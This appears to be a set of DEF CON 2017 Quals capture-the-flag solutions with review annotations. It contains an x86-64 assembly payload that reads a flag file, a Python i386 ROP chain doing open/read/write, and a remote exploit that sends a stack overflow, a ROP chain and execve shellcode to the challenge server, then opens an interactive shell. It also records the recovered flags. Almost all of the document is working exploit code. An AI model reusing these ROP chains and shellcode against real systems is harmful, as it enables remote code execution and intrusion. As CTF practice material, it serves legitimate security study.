DEFCON 2017 Quals
BITS 64
; Stage-2 payload: close the fd handed over in rax, open "flag", read up to
; 0x80 bytes of it to rbp-0x80, then hang or fall through depending on one
; byte of the buffer. No error paths: a failed open()/read() is not detected.
_start:
    mov rdi, rax            ; rdi = fd inherited in rax from whatever ran before (not visible here)
    mov rax, 0x3            ; SYS_close (x86-64)
    syscall
    pop rcx                 ; only advances rsp by 8 -- rcx is overwritten on the next line
    mov rcx, 0x67616c66     ; "flag" little-endian; the imm32 is zero-extended, so the high bytes act as the NUL terminator
    push rcx
    mov rdi, rsp            ; pathname = "flag\0" now on the stack
    xor rsi, rsi            ; flags = 0 (O_RDONLY)
    xor rdx, rdx            ; mode = 0
    mov rax, 0x2            ; SYS_open (x86-64)
    syscall
readflag:
    mov rdi, rax            ; fd returned by open(); a negative error value is passed on unchecked
    mov rsi, rbp
    sub rsi, 0x80           ; buffer at rbp-0x80 -- assumes rbp still points at a live stack frame
    mov rdx, 0x80           ; count = 128 bytes
    xor rax, rax            ; SYS_read (x86-64)
    syscall
checkflag:
    mov al, [rsi+0x32]      ; byte at offset 0x32 of the buffer; not compared against the number of bytes actually read
    cmp al, 0x64
    jge checkflag           ; signed compare: loops forever when the byte is >= 0x64, otherwise falls through to whatever follows
#! python3 | |
import sys | |
# Addresses in the 32-bit target binary. The names record what the author
# believes each location or gadget is; nothing in this file can verify them.
bss1 = 0x80ecfc4        # writable address used as the read()/write() buffer in exploit()
bss = 0x80ecfc4+140     # not referenced by exploit() in this file
ptr = 0x80ed02c         # not referenced by exploit() in this file
buf = 0x802d02c         # not referenced by exploit() in this file
int80 = 0x0806fae0      # presumably an `int 0x80` gadget; exploit() returns into it after loading eax/ebx/ecx/edx
pop_eax = 0x080e558a    # not referenced by exploit() in this file
push_eax = 0x080e789c   # not referenced by exploit() in this file
pop_ebx = 0x080481c9
pop_ecx = 0x080e5ee1
push_ecx = 0x080e403a   # not referenced by exploit() in this file
pop_edx = 0x0806f2fa
push_edx = 0x08064828   # not referenced by exploit() in this file
push_esp = 0x080e192d   # not referenced by exploit() in this file
xchg_eax_edx = 0x080e8e02
xor_eax_eax = 0x080555c0
inc_eax = 0x080e30a3
inc_ebx = 0x080e9b21
inc_ecx = 0x080e794e
inc_edx = 0x0805da67    # not referenced by exploit() in this file
#binsh = b'/bin/sh'
flag = b'flag'          # filename appended to the end of the stage-1 input in exploit()
gablen = 100            # NOTE(review): unused -- exploit() pads with the literal 100; keep the two in sync or drop this
def exploit():
    """Build the stage-1 input for the target and write it raw to stdout.

    The chain performs open("flag"), read(fd, bss1, ...) and write(1, bss1, ...)
    by loading eax/ebx/ecx/edx through pop/inc/xor gadgets and returning into
    `int80` before each call. Returns None; the bytes are meant to be piped
    into the target by the caller.

    NOTE(review): `pI` is neither defined nor imported in this file (the
    sibling script takes `pQ` from ctflib.util); presumably a 4-byte
    little-endian packer. Confirm it is in scope before running, otherwise
    the first line of the body raises NameError.
    """
    # open('flag', 0, 0);
    payload = b''
    payload += pI(pop_ebx)
    payload += pI(0x080ed0d6)        # ebx = pathname pointer; where this address points is not verifiable here
    payload += pI(pop_ecx)
    payload += pI(0xffffffff)
    payload += pI(inc_ecx)           # ecx wraps to 0 (flags)
    payload += pI(xor_eax_eax)
    payload += pI(xor_eax_eax)
    payload += pI(xchg_eax_edx)      # edx = 0 (mode); eax picks up edx's old value and is cleared again below
    payload += pI(xor_eax_eax)
    payload += pI(inc_eax)*(0x5)     # eax = 5 = SYS_open on i386
    payload += pI(int80)
    #payload += pI(bss)
    # read(3, bss1, 0x0e0e0e0e);
    payload += pI(pop_ebx)
    payload += pI(0xffffffff)
    payload += pI(inc_ebx)*4         # ebx = 3: assumes open() returned fd 3 (no check of the return value)
    payload += pI(pop_ecx)
    payload += pI(bss1)
    payload += pI(pop_edx)
    payload += pI(0x0e0e0e0e)        # deliberately large count
    payload += pI(xor_eax_eax)
    payload += pI(inc_eax)*(0x3)     # eax = 3 = SYS_read on i386
    payload += pI(int80)
    # write(1, bss1, 0x0e0e0e0e);
    payload += pI(pop_ebx)
    payload += pI(0xffffffff)
    payload += pI(inc_ebx)*2         # ebx = 1 (stdout)
    payload += pI(pop_ecx)
    payload += pI(bss1)              # edx is not reloaded: still 0x0e0e0e0e from the read() setup
    payload += pI(xor_eax_eax)
    payload += pI(inc_eax)*(0x4)     # eax = 4 = SYS_write on i386
    payload += pI(int80)
    payload1 = b''
    payload1 += pI(0x31457185)       # leading 4-byte value the target reads first; its meaning is not recoverable from this file
    payload1 += b'b'*100             # presumably padding up to the saved return address (see gablen at module level)
    payload1 += payload
    payload1 += b'./'*50             # "./" * 50 + "flag" still resolves to ./flag in the working directory
    payload1 += flag
    payload1 += b'\n'
    # Remaining lines are answers to the target's later prompts; taken as-is from the author.
    payload1 += b'15\n'
    payload1 += b'y\n'
    payload1 += b'20\n'
    payload1 += b'y\n'
    payload1 += b'20\n'
    payload1 += b'y\n'
    payload1 += b'23\n'
    payload1 += b'n\n'
    sys.stdout.buffer.write(payload1)  # raw bytes, so the binary buffer is used rather than the text stream
def main():
    """Script entry point: emit the stage-1 input on stdout via exploit()."""
    exploit()
# Only run when executed as a script, not when imported.
if __name__ == '__main__':
    main()
# Writeup note kept as a bare string expression; it has no effect at runtime.
"""
The flag is: Thanks to Kenshoto for the inspiration! 5fbb34920c457b2e0855a174b8de3ebc
"""
#! python3 | |
from ctflib import Pwn | |
from ctflib.util import * | |
import sys | |
import time | |
def exploit(cn):
    """Send the overflow + ROP chain over *cn*, then the second stage, then hand over to the user.

    *cn* is the connection object created in main(); only send() and
    interact() are used here. Its type comes from ctflib and is not visible
    in this file. Returns None.
    """
    paylen = 33                     # NOTE(review): unused -- the padding below uses the literal 33; use one or the other
    # Addresses in the target binary; names are the author's and cannot be verified here.
    pop_rdi_ret = 0x4014d6
    pop_rsi_ret = 0x4015f7
    pop_rdx_ret = 0x441e46
    main_gets = 0x4009dd            # NOTE(review): unused in this function
    bss = 0x6ca000                  # writable destination for the second stage and the chain's final return target
    syscall_ret = 0x466815
    # Second stage, 27 bytes. It ends in `mov al, 0x3b; syscall` (b0 3b 0f 05), i.e. an execve call.
    sc = b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'
    payload = b''
    payload += b'Smash me outside, how bout dAAAAAAAAAAA'   # fixed prefix the target presumably expects before the overflow
    payload += b'b'*(33)            # padding up to the saved return address (33 bytes, cf. paylen)
    # Chain: rsi = bss, rdi = 0, rdx = 0x30, then the syscall gadget.
    # NOTE(review): nothing here loads rax; the chain relies on rax already being 0 (SYS_read)
    # when the gadget runs -- confirm what the overflowed function leaves in rax.
    payload += pQ(pop_rsi_ret)
    payload += pQ(bss)
    payload += pQ(pop_rdi_ret)
    payload += pQ(0)
    payload += pQ(pop_rdx_ret)
    payload += pQ(0x30)             # 0x30 bytes requested; sc is 27 bytes
    payload += pQ(syscall_ret)
    payload += pQ(bss)              # after the syscall, return into the bytes just written at bss
    payload += b'\n'
    #input('aaa')
    cn.send(payload)
    time.sleep(1)                   # fixed delay rather than waiting for the target to block in read(); racy on a slow link
    cn.send(sc)
    cn.interact()
def main():
    """Connect to the challenge service and hand the connection to exploit()."""
    conn = Pwn()
    # Local instance used during development: conn.connect('localhost', 57348)
    conn.connect('smashme_omgbabysfirst.quals.shallweplayaga.me', 57348)
    exploit(conn)
# Only run when executed as a script, not when imported.
if __name__ == '__main__':
    main()
# Writeup note kept as a bare string expression; it has no effect at runtime.
"""
The flag is: You must be at least this tall to play DEF CON CTF
"""